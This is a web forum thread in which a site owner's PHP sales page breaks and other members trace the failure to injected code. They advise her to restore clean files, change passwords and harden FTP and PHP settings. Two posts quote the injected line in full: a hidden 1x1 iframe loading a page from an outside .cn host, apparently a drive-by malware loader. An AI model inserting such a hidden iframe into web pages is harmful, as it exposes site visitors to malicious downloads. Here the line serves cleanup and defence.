Oooops! PHP help needed please (I think)

15 replies
My sales page was working fine last week. Now I get:

Parse error: syntax error, unexpected T_STRING, expecting ',' or ';' in /home/www/behavioralproblemsinchildren.com/index.php on line 256

I have absolutely no idea what that means.

My site was set up using $7 script and I have since added SMF so am not sure whether that caused the problem and if so, I have no idea how to fix it. The forum is working fine though.

I would appreciate any help available. I can just about manage HTML, but PHP is beyond me.

Thanks

Sandy
#needed #ops #php
  • Profile picture of the author kool
    pm sent.

    Karuna
    Signature
    {{ DiscussionBoard.errors[691381].message }}
  • Profile picture of the author gyar29
    Sandy,
    The error is a parse error also referred to as a runtime error. On line 256 of the code for your index page you're probably missing a semi-colon ; at the end of the line. PHP requires that the end of each line of code end in a semi-colon. You may also be missing a " or a }.

    If line 256 is the last line of code on the page, or the end of a function then you're probably missing the ending bracket }.

    Whichever it is you need to find line 256 in the code. And see if it is properly formed. Remember when counting the lines in the code you must also count any white space in the code created by a carriage return. Using an editor that counts your lines for you and highlights different parts of the code would make your life easier.

    You will find a free editor that you can download using this link to PSPad This editor is free and powerful enough to do anything a beginner with PHP may need. There are a number of free editors that you could use if you don't like that one. FirstPage 2000 or PHPDeveloper come to mind.

    Anyway, fixing this problem is a relatively simple task. Just have a little patience when looking for the problem.

    If you can't find it. PM me and I'll see if I can help you out.

    Good Luck,
    Gene
    {{ DiscussionBoard.errors[691386].message }}
  • Profile picture of the author Bishop81
    Send me a pm if you still need help with this. I'll fix it for free.
    Signature

    I'm tired of my signature... Deleted.

    {{ DiscussionBoard.errors[691782].message }}
    • Profile picture of the author alexpoole
      Hi Sandy,

      Just escape all the quote marks with slashes like \"this\"

      I would show you, but my post count isn't high enough to paste a URL :/

      Hope that helps..

      Alex
      Signature
      {{ DiscussionBoard.errors[691820].message }}
  • Profile picture of the author Bishop81
    Apparently, last week was some idiot hacker's attempt to mess up a bunch of sites. I just had somebody else that I support have this problem, and this didn't even occur to me until looking at this post again.

    Download all of your files to a new folder for backup purposes... You don't want to overwrite any existing "good" files that you may have. In that backup folder, you're going to want to do a search in every single file for "<iframe src="http://lotultimatebet.cn/in.cgi?income59" width=1 height=1 style="visibility: hidden"></iframe> ". Delete that line from all of your files and then re-upload them.

    That'll fix it. I know that dreamweaver will do a folder level find/replace, but I think that Typepad may also do it. Typepad is a free program, so you might try that first if you don't have anything else that does it.
    Signature

    I'm tired of my signature... Deleted.

    {{ DiscussionBoard.errors[691895].message }}
    • Profile picture of the author SandyDuPlessis
      Originally Posted by Bishop81 View Post

      Apparently, last week was some idiot hacker's attempt to mess up a bunch of sites. I just had somebody else that I support have this problem, and this didn't even occur to me until looking at this post again.

      Download all of your files to a new folder for backup purposes... You don't want to overwrite any existing "good" files that you may have. In that backup folder, you're going to want to do a search in every single file for "<iframe src="http://lotultimatebet.cn/in.cgi?income59" width=1 height=1 style="visibility: hidden"></iframe> ". Delete that line from all of your files and then re-upload them.

      That'll fix it. I know that dreamweaver will do a folder level find/replace, but I think that Typepad may also do it. Typepad is a free program, so you might try that first if you don't have anything else that does it.
      Oh help :confused: I don't have dreamweaver. Does Typepad work with Mac?
      Doing this little tricK manually is going to be something else!

      alexpoole
      Hi Sandy,

      Just escape all the quote marks with slashes like "this"

      I would show you, but my post count isn't high enough to paste a URL :/

      Hope that helps..

      Alex
      I forgot to mention that I am a techy klutz. You have lost me already. What will that do?

      Bishop81

      Send me a pm if you still need help with this. I'll fix it for free.
      Thank you so much for that offer.

      Sandy
      {{ DiscussionBoard.errors[692115].message }}
  • Profile picture of the author stevenh512
    Sandy, you definitely had some code "injected" into your site somehow, it's been happening to a lot of people over the past couple weeks. If you still have the original index.php (you should, it's the index.php that comes with the $7 script) just upload a fresh copy and overwrite the one that's on the server.

    Make sure you change all of your passwords for FTP and cpanel too just to make it a little harder for someone to do something like this to you again.

    Also, check with your web host and verify that they've closed a few things that could be security holes.. here's a few examples

    Anonymous FTP should be disabled, there's no need for it and depending on how the server is set up sometimes hackers can get in that way and do bad things.

    PHP's REGISTER_GLOBALS setting should be disabled. It's been known for years to be a major security hole but a lot of hosts still leave it enabled anyway because some older scripts still require it (personally I think if a script requires it, it needs to be rewritten because it probably has other security holes too).

    If your host supports SFTP or SCP for transferring your files to the server, start using that and ditch standard FTP completely. FTP is not a secure protocol, your password is always sent to the server "in the clear" and it's not hard for a hacker to packet sniff your connection and get your login info. SFTP and SCP use encryption so they're a lot safer. Most cpanel based hosts support SFTP, and most FTP programs support it too, it's usually just a matter of changing one setting in your FTP program (and since I don't have a mac I wouldn't be able to tell you what to change, sorry).
    Signature

    This signature intentionally left blank.

    {{ DiscussionBoard.errors[692138].message }}
    • Profile picture of the author SandyDuPlessis
      Originally Posted by stevenh512 View Post

      Sandy, you definitely had some code "injected" into your site somehow, it's been happening to a lot of people over the past couple weeks. If you still have the original index.php (you should, it's the index.php that comes with the $7 script) just upload a fresh copy and overwrite the one that's on the server.

      Make sure you change all of your passwords for FTP and cpanel too just to make it a little harder for someone to do something like this to you again.

      Also, check with your web host and verify that they've closed a few things that could be security holes.. here's a few examples

      Anonymous FTP should be disabled, there's no need for it and depending on how the server is set up sometimes hackers can get in that way and do bad things.

      PHP's REGISTER_GLOBALS setting should be disabled. It's been known for years to be a major security hole but a lot of hosts still leave it enabled anyway because some older scripts still require it (personally I think if a script requires it, it needs to be rewritten because it probably has other security holes too).

      If your host supports SFTP or SCP for transferring your files to the server, start using that and ditch standard FTP completely. FTP is not a secure protocol, your password is always sent to the server "in the clear" and it's not hard for a hacker to packet sniff your connection and get your login info. SFTP and SCP use encryption so they're a lot safer. Most cpanel based hosts support SFTP, and most FTP programs support it too, it's usually just a matter of changing one setting in your FTP program (and since I don't have a mac I wouldn't be able to tell you what to change, sorry).
      Brilliant!!!

      Thank you. Replacing the exisitng index.php with the original script worked immediately. I really thought I had messed up yet AGAIN!

      Now I just need to change my passwords.

      Many many thanks to everybody who provided information and offered help. It was all much appreciated.

      Sandy
      {{ DiscussionBoard.errors[692159].message }}
  • Profile picture of the author stevenh512
    You should still go through the rest of the files on the server and check for that little piece of code, but at least this gets your site back up and running for now while you're dealing with any other files that might have been corrupted.
    Signature

    This signature intentionally left blank.

    {{ DiscussionBoard.errors[692180].message }}
  • Profile picture of the author Bishop81
    If you haven't made any changes since the last time you uploaded files, then you can just replace all code on the server with your good code. I would recommend making a backup of all pages on the server, though, just in case something is accidentally overwritten.
    Signature

    I'm tired of my signature... Deleted.

    {{ DiscussionBoard.errors[692195].message }}
    • Profile picture of the author SandyDuPlessis
      Originally Posted by Bishop81 View Post

      If you haven't made any changes since the last time you uploaded files, then you can just replace all code on the server with your good code. I would recommend making a backup of all pages on the server, though, just in case something is accidentally overwritten.
      I did back everything up, but have no idea whether it was before or after the "bad code" was inserted. I think it was before though.

      I will replace everything with what I have, but will still go through all the files and see if I can find that string mentioned by Stephan.

      Sandy
      {{ DiscussionBoard.errors[692224].message }}

Trending Topics